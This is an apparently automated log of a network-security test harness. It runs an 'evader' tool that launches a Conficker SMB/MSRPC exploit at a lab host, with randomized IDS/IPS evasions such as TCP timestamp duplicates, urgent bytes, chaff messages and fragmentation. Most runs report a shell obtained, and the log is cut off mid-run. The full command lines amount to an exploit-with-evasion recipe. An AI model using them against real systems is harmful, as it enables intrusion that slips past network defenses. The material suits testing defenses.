- 5607 runs averaging 1.99 runs / second ; progress: 2817/43200...................
- 5626 runs averaging 1.99 runs / second ; progress: 2822/43200..............
- 5640 runs averaging 2.00 runs / second ; progress: 2827/43200.......2015-06-08 00:06:40 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55004 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HTMWhpt4lOI --evasion=[msrpc_bind,end]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed HTMWhpt4lOI
- The following evasions are applied from stage netbios_connect to smb_connect:
- - 50% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:55004 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 5651 runs averaging 2.00 runs / second ; progress: 2832/43200.............
- 5664 runs averaging 2.00 runs / second ; progress: 2837/43200...............
- 5679 runs averaging 2.00 runs / second ; progress: 2842/43200..........
- 5689 runs averaging 2.00 runs / second ; progress: 2847/43200.....
- 5694 runs averaging 2.00 runs / second ; progress: 2852/43200............
- 5706 runs averaging 2.00 runs / second ; progress: 2857/43200..........Pid 8518 timed out - killed
- 2015-06-08 00:07:11 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28446 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=F6sYh44LGYY --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed F6sYh44LGYY
- The following evasions are applied from stage start to smb_connect:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:28446 -> 10.35.1.207:445
- Terminated
- 2015-06-08 00:07:11 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46988 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Sv3aj7zFtLI --evasion=[netbios_connect,msrpc_req]netbios_chaff,"8","small_unspec" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","52269486","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"25%","205278740","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Sv3aj7zFtLJ
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52269486> and has random alphanumeric bytes as payload
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type.
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 205278740> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:46988 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ....
- 5722 runs averaging 2.00 runs / second ; progress: 2862/43200...................
- 5741 runs averaging 2.00 runs / second ; progress: 2867/43200.................
- 5758 runs averaging 2.00 runs / second ; progress: 2872/43200............
- 5770 runs averaging 2.01 runs / second ; progress: 2877/43200..........
- 5780 runs averaging 2.01 runs / second ; progress: 2882/43200..................
- 5798 runs averaging 2.01 runs / second ; progress: 2887/43200...................2015-06-08 00:07:41 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65225 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=b+LULLXLP9A --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","4","1645","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed b+LULLXLP9B
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 1645 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.116:65225 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 5822 runs averaging 2.01 runs / second ; progress: 2892/432002015-06-08 00:07:42 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14977 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=/6AH03N7Zfg --evasion=[smb_connect,end]tcp_paws,"50%","108770038","alphanumrandomized" --evasion=[msrpc_req,end]tcp_segvar,"7","30328" --verifydelay=1000 --payload=shell
- Info: Using random seed /6AH03N7Zfj
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 108770038> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - TCP packets are segmented to contain between 7 and 30328 bytes of payload.
- Info: NetBIOS connection 10.62.90.116:14977 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .................
- 5840 runs averaging 2.02 runs / second ; progress: 2897/43200..................
- 5858 runs averaging 2.02 runs / second ; progress: 2902/43200.................
- 5875 runs averaging 2.02 runs / second ; progress: 2907/43200...............2015-06-08 00:08:00 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51948 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fl6e6aGm5+U --evasion=[smb_opentree,end]netbios_chaff,"13","empty_unspec|empty_keepalive|msrpc_req" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","92936105","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed fl6e6aGm5+V
- The following evasions are applied from stage smb_opentree to end:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 92936105> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:51948 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .......
- 5898 runs averaging 2.03 runs / second ; progress: 2912/432002015-06-08 00:08:03 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46316 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=WPmLbVV+KN8 --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[start,end]tcp_paws,"25%","248594867","random_alphanum" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","140365635","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed WPmLbVV+KN9
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248594867> and has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140365635> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.112:46316 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..........Pid 9568 timed out - killed
- 2015-06-08 00:08:07 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20559 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Lu/W+J+ia8E --evasion=[netbios_connect,smb_connect]tcp_urgent,"5","zero" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed Lu/W+J+ia8E
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Add a zero urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:20559 -> 10.35.1.207:445
- Terminated
- 5910 runs averaging 2.03 runs / second ; progress: 2917/43200........2015-06-08 00:08:10 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26515 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dmrBvWj+KHs --evasion=[start,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,msrpc_req]smb_chaff,"21","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","161045439","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed dmrBvWj+KHt
- The following evasions are applied from stage start to msrpc_req:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161045439> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.112:26515 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 5925 runs averaging 2.03 runs / second ; progress: 2922/43200.2015-06-08 00:08:13 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29584 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=tYONh/AvK4Y --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"1","268435455","random_alpha" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
- Info: Using random seed tYONh/AvK4a
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 1048575 bytes.
- The following evasions are applied from stage smb_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.112:29584 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .....................
- 5948 runs averaging 2.03 runs / second ; progress: 2928/43200............2015-06-08 00:08:22 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26011 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=jfv1oCGsfoE --evasion=[msrpc_bind,end]tcp_paws,"50%","8","random_alpha" --evasion=[netbios_connect,smb_connect]tcp_segvar,"5","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed jfv1oCGsfoG
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP packets are segmented to contain between 5 and 65534 bytes of payload.
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.116:26011 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 5964 runs averaging 2.03 runs / second ; progress: 2933/43200................
- 5980 runs averaging 2.04 runs / second ; progress: 2938/432002015-06-08 00:08:28 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53136 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KkbNMAGYqPk --evasion=[msrpc_bind,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed KkbNMAGYqPk
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.116:53136 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..................
- 5999 runs averaging 2.04 runs / second ; progress: 2943/43200..2015-06-08 00:08:33 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62808 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Y9jHGKPdrkQ --evasion=[msrpc_req,end]smb_writeandxpad,"8","zero" --evasion=[netbios_connect,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Y9jHGKPdrkR
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- Info: NetBIOS connection 10.62.90.112:62808 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .................................
- 6035 runs averaging 2.05 runs / second ; progress: 2948/43200....................
- 6055 runs averaging 2.05 runs / second ; progress: 2953/43200........2015-06-08 00:08:45 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47868 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=xqepctN8ai8 --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"72" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","6","3","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed xqepctN8ai/
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 72 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 3 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:47868 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....2015-06-08 00:08:46 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33860 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Ln/5ZlyjG9A --evasion=[smb_opentree,end]smb_decoytrees,"4","6","2","random_msrpcbind" --evasion=[netbios_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed Ln/5ZlyjG9A
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.113:33860 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 6078 runs averaging 2.05 runs / second ; progress: 2958/43200....
- 6082 runs averaging 2.05 runs / second ; progress: 2963/43200..........
- 6092 runs averaging 2.05 runs / second ; progress: 2968/43200...
- 6095 runs averaging 2.05 runs / second ; progress: 2973/43200........
- 6103 runs averaging 2.05 runs / second ; progress: 2978/43200.........
- 6112 runs averaging 2.05 runs / second ; progress: 2983/43200......
- 6118 runs averaging 2.05 runs / second ; progress: 2988/43200...
- 6121 runs averaging 2.04 runs / second ; progress: 2993/43200.....
- 6126 runs averaging 2.04 runs / second ; progress: 2998/43200...............
- 6141 runs averaging 2.04 runs / second ; progress: 3003/43200................
- 6157 runs averaging 2.05 runs / second ; progress: 3008/43200........
- 6165 runs averaging 2.05 runs / second ; progress: 3013/43200.
- 6166 runs averaging 2.04 runs / second ; progress: 3018/43200.......2015-06-08 00:09:52 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48430 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jheLxOYHTqY --evasion=[msrpc_req,end]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"75%","268435454","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed jheLxOYHTqa
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- Info: NetBIOS connection 10.62.90.113:48430 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..
- 6176 runs averaging 2.04 runs / second ; progress: 3023/43200................
- 6192 runs averaging 2.04 runs / second ; progress: 3028/43200...2015-06-08 00:10:00 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30613 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=zrd64b/IIsg --evasion=[start,msrpc_req]tcp_chaff,"50%","shorthdr|longhdr","random" --evasion=[smb_opentree,end]tcp_paws,"5","52714395","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed zrd64b/IIsj
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52714395> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.116:30613 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 6199 runs averaging 2.04 runs / second ; progress: 3033/43200.......
- 6206 runs averaging 2.04 runs / second ; progress: 3038/43200....
- 6210 runs averaging 2.04 runs / second ; progress: 3044/43200........
- 6218 runs averaging 2.04 runs / second ; progress: 3049/43200
- 6218 runs averaging 2.04 runs / second ; progress: 3054/43200...2015-06-08 00:10:28 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64754 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=kJYCaqQqc2Y --evasion=[start,end]tcp_initialseq,"4294967295" --evasion=[smb_opentree,end]tcp_paws,"50%","5765228","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed kJYCaqQqc2a
- - Initial TCP sequence number is set to 0xffffffff - 4294967295
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5765228> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.116:64754 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 6224 runs averaging 2.03 runs / second ; progress: 3059/43200.................
- 6241 runs averaging 2.04 runs / second ; progress: 3064/43200..........
- 6251 runs averaging 2.04 runs / second ; progress: 3069/43200
- 6251 runs averaging 2.03 runs / second ; progress: 3074/43200
- 6251 runs averaging 2.03 runs / second ; progress: 3079/43200.
- 6252 runs averaging 2.03 runs / second ; progress: 3084/43200....
- 6256 runs averaging 2.03 runs / second ; progress: 3089/43200Pid 12828 timed out - killed
- 2015-06-08 00:11:00 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22545 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=m9GqZcPtAhc --evasion=[netbios_connect,smb_openpipe]tcp_urgent,"5","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed m9GqZcPtAhe
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - Add a random alphaurgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.117:22545 -> 10.35.1.207:445
- Terminated
- .
- 6258 runs averaging 2.02 runs / second ; progress: 3094/43200Pid 13136 timed out - killed
- 2015-06-08 00:11:05 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41641 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=37m4osrLY9M --evasion=[netbios_connect,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 37m4osrLY9P
- The following evasions are applied from stage netbios_connect to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:41641 -> 10.35.1.207:445
- Terminated
- ....
- 6263 runs averaging 2.02 runs / second ; progress: 3099/43200........
- 6271 runs averaging 2.02 runs / second ; progress: 3104/43200..........
- 6281 runs averaging 2.02 runs / second ; progress: 3109/43200........2015-06-08 00:11:22 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54476 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=BY1D6exxlwo --evasion=[start,msrpc_bind]tcp_paws,"13","10","shuffle" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","140207545","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed BY1D6exxlwo
- The following evasions are applied from stage start to msrpc_bind:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140207545> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:54476 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 6292 runs averaging 2.02 runs / second ; progress: 3114/43200.......
- 6299 runs averaging 2.02 runs / second ; progress: 3119/43200.............
- 6312 runs averaging 2.02 runs / second ; progress: 3124/43200......
- 6318 runs averaging 2.02 runs / second ; progress: 3129/43200...........
- 6329 runs averaging 2.02 runs / second ; progress: 3134/43200.2015-06-08 00:11:45 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49441 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=z1IpDeH5f6U --evasion=[msrpc_bind,end]tcp_paws,"50%","122942823","random" --evasion=[msrpc_bind,end]tcp_urgent,"13","random" --verifydelay=1000 --payload=shell
- Info: Using random seed z1IpDeH5f6X
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122942823> and has random bytes as payload
- - Add a random urgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.117:49441 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
